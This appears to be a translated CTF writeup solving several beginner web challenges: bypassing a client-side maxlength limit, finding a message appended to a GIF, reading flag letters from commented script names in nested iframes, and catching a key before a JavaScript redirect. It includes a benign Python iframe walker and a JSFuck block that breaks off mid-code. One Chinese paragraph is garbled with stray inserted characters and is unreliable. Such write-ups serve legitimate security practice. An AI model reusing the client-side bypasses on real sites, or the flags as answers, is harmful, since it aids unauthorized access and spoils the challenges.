Sign-in 2
-
It says to enter zhimakaimen. I wasn't paying attention at first: the input box only accepts 10 characters, but zhimakaimen is eleven characters. I only noticed after inspecting the element.
- Just change the maxlength attribute and submit. The limit lives only in the HTML; the server never checks it, so the full string goes straight through.
- flag is:nctf{follow_me_to_exploit}
This one isn't Web
Really, trust me! This one isn't Web
Portal: challenge link.
-
It's an animated GIF. Download it, open it in 010 Editor and scroll to the end of the file: the message is appended after the image data, where viewers ignore it.
- nctf{photo_can_also_hid3_msg}
Layer by layer
A challenge by hacker uncle p0tt1
Follow him on Weibo~
Challenge portal: challenge link
- It's a web page. No idea where to start, so view the source.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>SuperSo | by:p0tt1</title>
<meta name="keywords" content="SuperSo | by:p0tt1">
<meta name="Description" content="SuperSo | by:p0tt1" />
<!-- css,js -->
<style type="text/css">
*{margin:0;padding:0;}
body{background:#FFFFFF;font-size:12px;font-family:"微軟雅黑";#666}
.course{width:1024px;height:680px;margin:30px auto;}
.course .course_box{width:255px;height:155px;background:#FFCC66;float:left;margin-left:1px;
cursor:pointer;margin-bottom:20px;color:#fff;position:relative;
}
.course .course_box h3{font-size:24px;font-weight:300;text-align:center;margin-top:63px;}
.course .course_box p{width:255px;height:155px;position:absolute;left:0;top:0;padding:10px;background:#000;opacity:0.5;
filter:alpha(opacity=50);display:none;
}
.course .course_box p span{display:block;margin-top:2px;padding:2px;}
.course .course_box p .course_title{font-size:22px;}
.course .tz_blue{background:#2d8af1;}
.course .tz_red{background:#D44825;}
.course .tz_gray{background:#666;}
.course .tz_org{background:#ff6e1a;}
.course .tz_lv{background:#0cc5e7;}
.course .tz_qing{background:#64d500;}
.course .tz_yellow{background:#d5c300;}
.course .tz_blue{background:#2d8af1;}
.course .tz_bluees{background:#2a45f1;}
.course .tz_redd{background:#D44835;}
.course .tz_grayy{background:black;}
.course .tz_orgg{background:#ff6e4a;}
.course .tz_lvv{background:#0cc5a7;}
.course .tz_qingg{background:#64c500;}
.course .tz_yelloww{background:#d45300;}
.course .tz_bluee{background:#2ddff1;}
</style>
<link href="css/animate.min.css" rel="stylesheet" type="text/css">
</link>
</head>
<body>
<body style="overflow:auto;">
<iframe runat="server" src="SO.html" width="100%" height="237" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>
<iframe runat="server" src="http://www.lunzhiyu.com" width="100%" height="3800" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes">
</iframe>
</body>
</html>
- 代碼里有個(gè)iframe比較顯眼勾栗,而且他的屬性值也很奇怪,不是0就是no盏筐,想到題目層層遞進(jìn)围俘,相比信息都藏在iframe里面的src吧,嘗試點(diǎn)iframe里的src琢融,嘗試發(fā)現(xiàn)界牡,只有第一個(gè)S0.html有信息,第二個(gè)iframe的http://www.lunzhiyu.com沒有信息漾抬,于是一直點(diǎn)進(jìn)去第一個(gè)iframe宿亡。
- 多次點(diǎn)擊之后,得到:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Someone sneaked ahead to do the challenge, haha, gone already?</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
BODY { font: 9pt/12pt 宋體 }
H1 { font: 12pt/15pt 宋體 }
H2 { font: 9pt/12pt 宋體 }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY>
<center>
<TABLE width=500 border=0 cellspacing=10><TR><TD>
<!-- Placed at the end of the document so the pages load faster -->
<!--
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->
<p>Come, come, let me tell you a story:</p>
<ul>
<li>Once upon a time I was a good girl, and I fell for a boy, Little A.</li>
<li>One day I finally decided to confess to him! The words were on my lips, I gathered my courage... </li>
<li>But then I got scared and <a href="javascript:history.back(1)">backed away</a>...</li>
</ul>
<h2>Why?
<br>Why am I such a coward?</h2>
<hr>
<p>In the end he actually confessed to me, so happy... He said as long as I lure enough fools here to waste their time listening to this silly story,</p>
<p>he will agree to go out with me!</p>
<p>Thank you for your support! Wahaha \(^o^)/~!</p>
</TD></TR></TABLE>
</center>
</BODY></HTML>
-
Look closely at the commented-out script tags: every src is jquery-<one character>.7.2.min.js, and read top to bottom those characters spell out the flag. Hidden deep enough.
- nctf{this_is_a_fl4g}
-
Postscript:
With a proxy capture, or the Network tab of the inspector, you can see the request for 404.html; open it and view its source directly.
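The manual click-through above is the kind of thing worth automating when a challenge nests frames many levels deep. As an added example (not code from the original writeup or the challenge), here is a Python walker that follows iframe src links depth-first with a visited set and a depth bound, and at every page pulls the hidden character out of each `jquery-X.7.2.min.js` file name inside HTML comments. The three pages below are constructed, served out of a dict instead of over HTTP, and the host name example.test is an assumption; the commented script list is the one from the page above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin


class FrameAndCommentCollector(HTMLParser):
    """Collect iframe src attributes and HTML comment bodies from one page."""

    def __init__(self):
        super().__init__()
        self.iframe_srcs = []
        self.comments = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.iframe_srcs.append(src)

    def handle_comment(self, data):
        self.comments.append(data)


# The hidden character is the one between "jquery-" and ".7.2.min.js" in each script src.
SCRIPT_LETTER = re.compile(r"jquery-(.)\.7\.2\.min\.js")


def letters_in_comments(html):
    """Return the characters spelled by the commented-out script names, in page order."""
    parser = FrameAndCommentCollector()
    parser.feed(html)
    return "".join(ch for c in parser.comments for ch in SCRIPT_LETTER.findall(c))


def walk_iframes(fetch, start_url, max_depth=20):
    """Follow iframe src links depth-first from start_url.

    fetch(url) returns the page HTML, or None for pages to skip (off-site, 404, ...).
    The visited list stops loops (a frame that embeds itself); max_depth bounds the descent.
    Returns (urls visited in order, hidden letters concatenated in that order).
    """
    visited, letters = [], ""
    stack = [(start_url, 0)]
    while stack:
        url, depth = stack.pop()
        if url in visited or depth > max_depth:
            continue
        html = fetch(url)
        if html is None:
            continue
        visited.append(url)
        parser = FrameAndCommentCollector()
        parser.feed(html)
        letters += "".join(ch for c in parser.comments for ch in SCRIPT_LETTER.findall(c))
        # Push in reverse so the first iframe on the page is the next one followed.
        for src in reversed(parser.iframe_srcs):
            stack.append((urljoin(url, src), depth + 1))
    return visited, letters


# Constructed stand-in for the real site (assumed host); only same-site pages are "fetchable".
BASE = "http://example.test/web3/"
PAGES = {
    BASE: '<iframe src="SO.html"></iframe><iframe src="http://www.lunzhiyu.com"></iframe>',
    BASE + "SO.html": '<iframe src="404.html"></iframe>',
    BASE + "404.html": """<!--
<script src="./js/jquery-n.7.2.min.js"></script>
<script src="./js/jquery-c.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-{.7.2.min.js"></script>
<script src="./js/jquery-t.7.2.min.js"></script>
<script src="./js/jquery-h.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-i.7.2.min.js"></script>
<script src="./js/jquery-s.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-a.7.2.min.js"></script>
<script src="./js/jquery-_.7.2.min.js"></script>
<script src="./js/jquery-f.7.2.min.js"></script>
<script src="./js/jquery-l.7.2.min.js"></script>
<script src="./js/jquery-4.7.2.min.js"></script>
<script src="./js/jquery-g.7.2.min.js"></script>
<script src="./js/jquery-}.7.2.min.js"></script>
-->
<p>the decoy story goes here</p>""",
}


if __name__ == "__main__":
    print(walk_iframes(PAGES.get, BASE))
```

Against a live target, `fetch` would be a function that does the HTTP GET and returns None for hosts outside the challenge's domain, so the walker never wanders off to the unrelated site the second iframe points at.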
Single for twenty years
This one can be solved with skill or with hand speed!
This old man has been single for twenty years, so naturally it's hand speed!
Challenge address: go get him!
- Clicking in, the page redirects. The page shows:
There really is no KEY here, brother Tutu said so, and brother Tutu never tricks anyone. PS: Tutu is Runtu, not Tan Shen
- View the index page source: view-source:http://chinalover.sinaapp.com/web8/
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<a href="./search_key.php">_find the key here__</a>
</body>
</html>
- Open ./search_key.php. The browser is sent away at once by a JavaScript redirect, but the response body already contains the key; view the source, or fetch it with a client that does not run JavaScript, and it is right there:
<script>window.location="./no_key_is_here_forever.php"; </script>
key is : nctf{yougotit_script_now}
- nctf{yougotit_script_now}
___
Comprehensive challenge
Challenge address: tip:bash
- Opening it reveals JSFuck code
Whoa! What on earth is this
[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]](({}[[]]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!!
[]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+[])+({}[[]]+[])[!![]+!![]])+(!![]+[])[!![]+!![]+!![]]+({}[[]]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])
[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+[])[!![]+!![]+!![]])+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[
[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[
])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(!![]+[])[+!![]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[!![]+!![]+!![]]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()([][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!
![]+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+(!![]+[])[+[]]+({}[[]]+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]])())[!![]+!![]+!![]]+(!![]+[])[!![]+!![]+!![]])()(({}+[])[+[]])[+[]]+(!![]+!![]+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+({}[[]]+[])[+[]]+({}[[]]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]]+([]+[][(![]+[])[!![]+!![]+!![]]+({}+[])[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!![]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}[[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+[]]+({}+[])[!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+({}+[])[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+({}[[]]+[])[+[]]+(!![]+[])[+!![]]+({}[[]]+[])[+!![]]+({}+[])[!![]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!![]+!![]]+({}+[])[+!![]]+({}+[])[!![]+!![]+
